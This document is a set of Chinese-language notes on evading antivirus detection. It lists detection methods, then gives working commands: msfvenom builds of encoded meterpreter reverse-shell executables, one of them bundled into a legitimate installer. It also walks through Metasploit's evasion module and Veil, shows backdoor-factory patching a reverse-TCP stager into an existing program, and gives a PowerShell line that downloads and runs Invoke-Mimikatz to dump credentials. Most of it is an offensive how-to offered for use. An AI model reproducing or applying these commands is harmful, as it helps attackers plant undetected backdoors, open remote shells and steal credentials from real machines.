免杀

1、杀软(AV)

检测技术

扫描技术(静态)

1)扫描压缩包
2)急救盘扫描
3)智能扫描
4)全盘扫描
5)开机扫描

监控技术(动态)

1)内存监控
2)网页监控
3)行为监控

检测方法

1)特征码扫描
2)进程行为检测(沙盒法) :https://app.any.run/
3)主动防御
4)机器学习识别

绕过思路

1)修改特征码
2)加壳免杀
3)二次编译
4)分离免杀

vt（杀软pass检测）: https:/www.virustotal.com/

2、bypassAV

工具篇

msf自带免杀

编码: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe > 2.exe

编码+捆绑: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=4444 -x inst.exe -e x86/shikata_ga_nai -i 10 -f exe > 3.exe

msf自带免杀模块: evasion

用法:

use evasion/windows/windows_defender_exe

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.108

set lport 4444

exploit

veil

veil的安装：

kali2020已经预安装了veil

apt-get install veil

用法：

1、选择evasion
use 1
2、选择go/meterpreter/rev_tcp.py模块
list
use xx
3、用set命令设置参数

4、用generate生成

<>

exe文件的存放位置和msf监听的启动方法

msfconsole -r /var/lib/veil/output/handlers/xxx.rc

不过不能通过电脑管家的检测

the-backdoor-factory

1.检查软件是否支持patch

backdoor-factory -f /root/xxx.exe -S

2.查看软件代码缝隙大小。

backdoor-factory -f /root/xxx.exe -c

3.查看可利用的payload

backdoor-factory -f /root/xxx.exe -s show

4.指定payload、回连的IP地址和端口、输出软件的名字，并且指定要使用的代码缝隙。

backdoor-factory -f /root/xxx.exe -s iat_reverse_tcp_stager_threaded -5. -H x.x.x.x -P 4444 -o 1.exe

HackTheWorld
venom

语言篇

c/c++————自行编译

1、直接编译
2、申请动态内存加载
3、嵌入汇编加载( bypass360 )
4、强制类型转换
5、xor加密 ( bypass360 )
6、base64加密法
7、shellcode_launcher(bypass360)
8、分离免杀

python

1、python加载C代码
2、base64编码
3、xor编码
4、分离免杀

c#

1、直接编译
2、xor编码
3、base64编码
4、aes编码

powershell

执行方法

1、本地执行: Import-Module .\Invoke-Mimikatz.ps1

2、远程加载: powershell "IEX (New-Object Net.Weiclient).DownloadString('http://10.211.55.2/Invoke-Mimikatz.psl');Invoke-Mimikatz -DumpCreds"

bypass

Invoke-Shellcode

Invoke-Obfuscation